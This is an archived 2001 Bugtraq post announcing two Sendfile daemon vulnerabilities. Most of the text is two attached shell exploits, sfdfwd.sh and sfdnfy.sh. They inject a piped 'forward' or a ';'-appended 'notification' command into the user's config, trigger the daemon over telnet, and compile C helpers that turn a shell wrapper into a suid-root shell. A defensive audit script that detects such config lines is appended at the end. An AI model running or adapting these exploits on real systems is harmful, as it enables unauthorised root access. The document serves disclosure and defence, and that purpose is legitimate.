6501534 2001-05-15 09:10 -0700 /18 lines/ <psheep@hushmail.com>
Sent by: joel@lysator.liu.se
Imported: 2001-05-16 01:08 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17005>
Subject: Sendfile daemon bugs
------------------------------------------------------------
I have attached two simple scripts which exploit vulnerabilities
which exist in some versions of the Sendfile daemon; both allow
a local attacker to gain superuser privileges.
The bug exploited by sfdfwd.sh was supposed to have been fixed by the
patches provided in Debian Security Advisory DSA-050-1 and then
DSA-052-1 and was reported by Colin Phipps in November 2000; somehow
it has still not been fixed. The second bug has been reported
(without any success) to Debian; it is the result of a serialization
error combined with a lack of error checking.
Anyone using this package should download the most recent copy of the
source code directly from the author's site and manually compile it,
or apply the patch used in Debian-unstable (sendfile_2.1-25).
Up-to-date copies of the source can be obtained from
ftp://ftp.belwue.de/pub/unix/sendfile/current
(6501534) / <psheep@hushmail.com>/--------(Rewrapped)
Attachment (application/octet-stream) in text 6501535
Attachment (application/octet-stream) in text 6501536
6501535 2001-05-15 09:10 -0700 /111 lines/ <psheep@hushmail.com>
Attachment filename: "sfdfwd.sh"
Imported: 2001-05-16 01:08 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17006>
Attachment (text/plain) to text 6501534
Subject: Attachment (sfdfwd.sh) to: Sendfile daemon bugs
------------------------------------------------------------
#!/bin/sh
#
# sfdfwd - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2645
# http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=76048
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution exploit"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdfwd.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdfwd"
cc -o $PWD/sfdfwd $PWD/sfdfwd.c
if ! test -x $PWD/sfdfwd; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "forward = |$PWD/sfdfwd" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
QUIT
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root"
echo
exit 1
(6501535) / <psheep@hushmail.com>/------------------
6501536 2001-05-15 09:10 -0700 /113 lines/ <psheep@hushmail.com>
Attachment filename: "sfdnfy.sh"
Imported: 2001-05-16 01:08 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17007>
Attachment (text/plain) to text 6501534
Subject: Attachment (sfdnfy.sh) to: Sendfile daemon bugs
------------------------------------------------------------
#!/bin/sh
#
# sfdnfy - Sendfile daemon local arbitrary command execution vulnerability
#
# references:
# http://www.securityfocus.com/bid/2652
# http://www.securityfocus.com/bid/2631
#
# 04/24/01 psheep
SFUSER=$USER
SFHOST=localhost
SFPORT=saft
SFSPOOL=/var/spool/sendfile
SFUSERCFG="$SFSPOOL/$SFUSER/config/config"
echo "Sendfile daemon local arbitrary command execution vulnerability"
echo
echo " username = $SFUSER"
echo " spool directory = $SFSPOOL"
echo " config file = $SFUSERCFG"
echo " target hostname = $SFHOST"
echo " target port = $SFPORT"
echo
if ! test -d $SFSPOOL; then
echo "** unable to locate the sendfile spool directory, exiting"
exit 1
fi
sfsavedcfg="no"
if ! test -d $SFSPOOL/$SFUSER || ! test -d $SFSPOOL/$SFUSER/config; then
echo "** attempting to create sendfile spool directory for $SFUSER"
echo
(sleep 1;echo "TO $SFUSER";sleep 2) | telnet $SFHOST $SFPORT
echo
else
if test -f $SFUSERCFG; then
echo "** backing up your sendfile daemon configuration file"
mv $SFUSERCFG $SFSPOOL/$SFUSER/config/config.tmp
sfsavedcfg="yes"
fi
fi
cat > sfdnfy.c << EOF
#include <unistd.h>
#include <stdlib.h>
int main() {
setreuid(0,0);
setgid(0);
system("chown root.root $PWD/sfdsh;chmod 4755 $PWD/sfdsh");
}
EOF
cat > sfdsh.c << EOF
#include <unistd.h>
int main() {
setreuid(0,0);
setgid(0);
execl("/bin/sh", "sh", NULL);
}
EOF
echo "** compiling helper application as $PWD/sfdnfy"
cc -o $PWD/sfdnfy $PWD/sfdnfy.c
if ! test -x $PWD/sfdnfy; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** compiling shell wrapper as $PWD/sfdsh"
cc -o $PWD/sfdsh $PWD/sfdsh.c
if ! test -x $PWD/sfdsh; then
echo "** compilation failed, exiting"
exit 1
fi
echo "** inserting commands into temporary configuration file"
echo "notification = mail $USER;$PWD/sfdnfy" >$SFUSERCFG
echo "** attempting attack against sendfile daemon..."
echo
(sleep 1;cat << EOF
FROM $USER
TO $USER
FILE boom$RANDOM
SIZE 0 0
DATA
FILE boom$RANDOM
SIZE 1 0
DATA
EOF
sleep 2) | telnet $SFHOST $SFPORT
echo
if test "x$sfsavedcfg" = xyes; then
echo "** restoring backed up configuration file"
mv $SFSPOOL/$SFUSER/config/config.tmp $SFUSERCFG
else
echo "** removing temporary configuration file"
rm $SFUSERCFG
fi
echo "** done, the shell wrapper should be suid root after the mailer is done"
echo
exit 1
(6501536) / <psheep@hushmail.com>/--------(Rewrapped)
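
Both attachments work by writing a single line into the per-user file $SFSPOOL/$USER/config/config: a "forward" value that starts with a pipe (sfdfwd.sh) or a "notification" value with a command appended after ";" (sfdnfy.sh). The audit script below is an added example, not part of the original post or of the sendfile package; it scans a spool tree for settings of those two shapes. The flagging rules, the user names and the helper paths in the sample data are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): flag per-user sendfile config
# lines of the two shapes written by sfdfwd.sh and sfdnfy.sh.
# Assumption: a benign "forward" is an address, never a "|program" pipe, and
# a benign "notification" value has no shell metacharacters.

# Print "file:line:reason" for each suspicious setting under a spool dir.
audit_sendfile_spool() {
    for cfg in "$1"/*/config/config; do
        [ -f "$cfg" ] || continue
        awk -v f="$cfg" '{
            line = $0
            sub(/^[ \t]+/, "", line)
            if (line ~ /^#/ || line !~ /=/) next
            key = line; sub(/[ \t]*=.*/, "", key); key = tolower(key)
            val = line; sub(/^[^=]*=[ \t]*/, "", val)
            if (key == "forward" && substr(val, 1, 1) == "|")
                printf "%s:%d:forward pipes to a program\n", f, NR
            else if (key == "notification" && val ~ /[;|&`$<>]/)
                printf "%s:%d:notification has shell metacharacters\n", f, NR
        }' "$cfg"
    done
}

# Number of flagged lines under a spool dir.
count_findings() { audit_sendfile_spool "$1" | wc -l | tr -d ' '; }

# Build a constructed sample spool (hypothetical users and paths).
make_sample_spool() {
    for u in alice mallory eve; do mkdir -p "$1/$u/config"; done
    echo 'forward = bob@example.org' > "$1/alice/config/config"
    echo 'forward = |/home/mallory/helper' > "$1/mallory/config/config"
    printf '# constructed sample\nnotification = mail eve;/home/eve/helper\n' \
        > "$1/eve/config/config"
}

# Usage: sh audit.sh /var/spool/sendfile
if [ "$#" -gt 0 ]; then audit_sendfile_spool "$1"; fi
```

A hit only says a config line has one of these shapes; whether the daemon acts on it depends on the installed sendfile version, so the upgrade advice in the post still applies.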